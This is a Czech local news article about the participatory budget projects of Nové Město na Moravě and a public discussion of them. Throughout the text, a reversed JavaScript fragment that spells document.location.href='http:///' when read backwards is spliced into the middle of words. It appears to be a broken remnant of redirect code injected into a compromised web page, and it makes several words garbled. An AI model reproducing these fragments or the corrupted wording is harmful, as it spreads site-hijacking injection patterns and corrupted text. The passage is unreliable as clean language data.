Rainbow page separator

Lidé se seznámí s projekty, které bojují o jejich hlasy

Středa, 18. srpna 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Se všemi projekty druhého ročníku novoměstského participativního rozpočtu se mohou zájemci detailně seznámit při jejich veřejném projednávání a diskusi, které se uskuteční v pondělí 30. srpna od 18 hodin v ‚podpalubí‘ základní umělecké školy. Na místě budou pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomní jak au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toři projektů, tak i zástupci vedení radnice. Hlasování veřejnosti v participativním rozpočtu, pro který bylo vyčleněno 250 tisíc korun, prostřednictvím webu www.zapojse.nmnm.cz potrvá až do poloviny září.
Ve hře je celkem jedenáct nápadů, které splnily dané podmínky, z původních patnácti přihlášených projektů. Tři z nich se nějakým způsobem týkají vylepšení pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru u rybníka Koupaliště, ať už jde o obnovu dětského hřiště nebo třeba písčitý vstup do vody. Obyvatelé Nového Města však navrhli k realizaci také třeba otevřený dětský lanový park, pik[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];togramové koridory pro cyklisty, venkovní lezeckou stěnu, odpočinkovou zónu pro mladé i různá další vylepšení veřejného pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru.